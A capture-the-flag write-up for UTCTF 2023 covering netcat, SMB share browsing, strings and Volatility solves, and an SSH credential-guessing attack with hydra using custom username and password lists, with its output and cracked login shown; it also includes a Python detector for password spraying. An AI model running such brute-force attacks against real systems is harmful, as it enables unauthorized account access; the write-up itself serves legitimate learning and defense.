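This competition was held from 2023/3/11 9:00 (JST) to 2023/3/13 9:00 (JST).
I took part as a team again this time. We finished 81st out of 336 teams with 2647 points.
I am writing up the challenges I solved myself.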
Dry Run (Misc)
I joined the Discord and reacted with the check mark in the #rules channel, after which many channels appeared. The flag was written in a message in the #announcements channel.
utflag{welc0me_to_utctf!}
A Network Problem - Part 1 (Networking)
$ nc betta.utctf.live 8080
Hi Wade! I am using socat to broadcat this message. Pretty nifty right?
--jwalker
utflag{meh-netcats-cooler}
utflag{meh-netcats-cooler}
A Network Problem - Part 2 (Networking)
$ smbclient -L betta.utctf.live
Password for [WORKGROUP\kali]:
    Sharename       Type      Comment
    ---------       ----      -------
    WorkShares      Disk      Sharing of work files
    BackUps         Disk      File Backups.
    IPC$            IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
$ smbclient \\\\betta.utctf.live\\WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 9 04:45:05 2023
  ..                                  D        0  Thu Mar 9 04:45:05 2023
  shares                              D        0  Thu Mar 9 04:45:05 2023
    9974088 blocks of size 1024. 6296432 blocks available
smb: \> cd shares
smb: \shares\> ls
  .                                   D        0  Thu Mar 9 04:45:05 2023
  ..                                  D        0  Thu Mar 9 04:45:05 2023
  Advertising                         D        0  Thu Mar 9 04:45:05 2023
  OfficeFun                           D        0  Thu Mar 9 04:45:05 2023
  IT                                  D        0  Thu Mar 9 04:45:05 2023
    9974088 blocks of size 1024. 6296436 blocks available
smb: \shares\> cd IT
smb: \shares\IT\> ls
  .                                   D        0  Thu Mar 9 04:45:05 2023
  ..                                  D        0  Thu Mar 9 04:45:05 2023
  Itstuff                             D        0  Thu Mar 9 04:45:05 2023
    9974088 blocks of size 1024. 6296428 blocks available
smb: \shares\IT\> cd Itstuff\
smb: \shares\IT\Itstuff\> ls
  .                                   D        0  Thu Mar 9 04:45:05 2023
  ..                                  D        0  Thu Mar 9 04:45:05 2023
  notetoIT                            N      380  Thu Mar 9 04:45:05 2023
    9974088 blocks of size 1024. 6296420 blocks available
smb: \shares\IT\Itstuff\> get notetoIT
getting file \shares\IT\Itstuff\notetoIT of size 380 as notetoIT (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \shares\IT\Itstuff\> quit
$ cat notetoIT
I don't understand the fasination with the magic phrase "abracadabra", but too many people are using them as passwords. Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood all basically have the same password. Can you please reach out to them and get them to change thier passwords or at least get them append a special character?
-- Arty F.
utflag{out-of-c0ntrol-access}
utflag{out-of-c0ntrol-access}
A Network Problem - Part 3 (Networking)
The note seen in Part 2 said the following.
I don't understand the fasination with the magic phrase "abracadabra", but too many people are using them as passwords. Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood all basically have the same password. Can you please reach out to them and get them to change thier passwords or at least get them append a special character?
Using this as a reference, I create the usernames.txt list.
crystalball
crystal.ball
crystal_ball
cball
crybal
wadecoldwater
wade.coldwater
wade_coldwater
wcoldwater
wadcol
jaywalker
jay.walker
jay_walker
jwalker
jaywal
hollywood
holly.wood
holly_wood
hwood
holwoo
In addition, I create the passwords.txt list.
abracadabra
abracadabra@
abracadabra%
abracadabra+
abracadabra\
abracadabra/
abracadabra'
abracadabra!
abracadabra#
abracadabra$
abracadabra^
abracadabra?
abracadabra:
abracadabra,
abracadabra(
abracadabra)
abracadabra{
abracadabra}
abracadabra[
abracadabra]
abracadabra~
abracadabra-
abracadabra_
$ hydra -t 2 -L usernames.txt -P passwords.txt ssh://betta.utctf.live:8822
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-11 18:44:11
[DATA] max 2 tasks per 1 server, overall 2 tasks, 460 login tries (l:20/p:23), ~230 tries per task
[DATA] attacking ssh://betta.utctf.live:8822/
[STATUS] 22.00 tries/min, 22 tries in 00:01h, 438 to do in 00:20h, 2 active
[STATUS] 22.67 tries/min, 68 tries in 00:03h, 392 to do in 00:18h, 2 active
[STATUS] 21.43 tries/min, 150 tries in 00:07h, 310 to do in 00:15h, 2 active
[8822][ssh] host: betta.utctf.live login: wcoldwater password: abracadabra$
[STATUS] 21.58 tries/min, 259 tries in 00:12h, 201 to do in 00:10h, 2 active
[STATUS] 21.29 tries/min, 362 tries in 00:17h, 98 to do in 00:05h, 2 active
[STATUS] 21.39 tries/min, 385 tries in 00:18h, 75 to do in 00:04h, 2 active
[STATUS] 20.89 tries/min, 397 tries in 00:19h, 63 to do in 00:04h, 2 active
[STATUS] 21.00 tries/min, 420 tries in 00:20h, 40 to do in 00:02h, 2 active
[STATUS] 21.10 tries/min, 443 tries in 00:21h, 17 to do in 00:01h, 2 active
[STATUS] 20.86 tries/min, 459 tries in 00:22h, 1 to do in 00:01h, 2 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-11 19:06:41
Now that I know a user and password that can log in, I log in with that information.
$ ssh wcoldwater@betta.utctf.live -p 8822
wcoldwater@betta.utctf.live's password:
utctf{cust0m3d-lsts-rule!}
well done!
327f93bdc02d:~$
utctf{cust0m3d-lsts-rule!}
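Seen from the server side, the hydra run above is one source failing against many usernames at roughly one attempt every three seconds, followed by a successful login. The following Python detector is an added example, not part of the original writeup: it flags that pattern in sshd password-auth lines, assuming ISO-timestamped log lines, illustrative thresholds, and constructed sample data with documentation IP addresses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH password-auth lines; the ISO timestamp prefix is an assumed log format.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(lines, window=timedelta(minutes=5), min_failures=10, min_users=3):
    """Return (kind, source_ip, detail) alerts.
    'spray': detail is the number of distinct usernames that failed inside the window.
    'success_after_spray': detail is the account that then logged in from that source."""
    recent = defaultdict(deque)   # source ip -> (timestamp, user) failures inside the window
    flagged, alerts = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, user = datetime.fromisoformat(m["ts"]), m["ip"], m["user"]
        fails = recent[ip]
        while fails and ts - fails[0][0] > window:   # drop failures older than the window
            fails.popleft()
        if m["result"] == "Failed":
            fails.append((ts, user))
            users = {u for _, u in fails}
            if ip not in flagged and len(fails) >= min_failures and len(users) >= min_users:
                flagged.add(ip)
                alerts.append(("spray", ip, len(users)))
        elif ip in flagged:   # login from a source already seen spraying: likely compromise
            alerts.append(("success_after_spray", ip, user))
    return alerts

def build_sample():
    """Constructed log lines (documentation addresses, not data from the challenge host)."""
    t0 = datetime(2023, 3, 11, 18, 44, 0)
    names = ["cball", "wcoldwater", "jwalker", "hwood"]
    fmt = "{} sshd[{}]: {} password for {} from {} port {} ssh2"
    out = [fmt.format((t0 + timedelta(seconds=3 * i)).isoformat(), 100 + i, "Failed",
                      names[i % 4], "203.0.113.7", 40000 + i) for i in range(12)]
    # One user mistyping twice and then succeeding must not alert.
    for i, res in enumerate(["Failed", "Failed", "Accepted"]):
        out.append(fmt.format((t0 + timedelta(seconds=40 + i)).isoformat(), 200 + i, res,
                              "hwood", "198.51.100.20", 50000 + i))
    out.append(fmt.format((t0 + timedelta(seconds=60)).isoformat(), 300, "Accepted",
                          "wcoldwater", "203.0.113.7", 40100))
    return out

print(detect(build_sample()))
```

The second alert kind is the one to page on: it marks the account whose password should be reset and whose session should be reviewed.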
Reading List (Reverse Engineering)
$ strings readingList | grep utflag{
utflag{string_theory_is_a_cosmological_theory_based_on_the_existence_of_cosmic_strings}
utflag{string_theory_is_a_cosmological_theory_based_on_the_existence_of_cosmic_strings}
"Easy" Volatility (Forensics)
The flag is apparently contained as a shell command, and it is said to be in UUID format.
$ zstd -d debian11.core.zst
debian11.core.zst : 2138900771 bytes
$ zstd -d debian11_5.10.0-21.json.zst
debian11_5.10.0-21.json.zst: 33329346 bytes
$ mv debian11_5.10.0-21.json volatility3/symbols
$ python3 vol.py -f debian11.core linux.bash
Volatility 3 Framework 2.4.1
Progress: 100.00 Stacking attempts finished
PID Process CommandTime Command
467 bash 2023-03-05 18:21:23.000000 # 08ffea76-b232-4768-a815-3cc1c467e813
08ffea76-b232-4768-a815-3cc1c467e813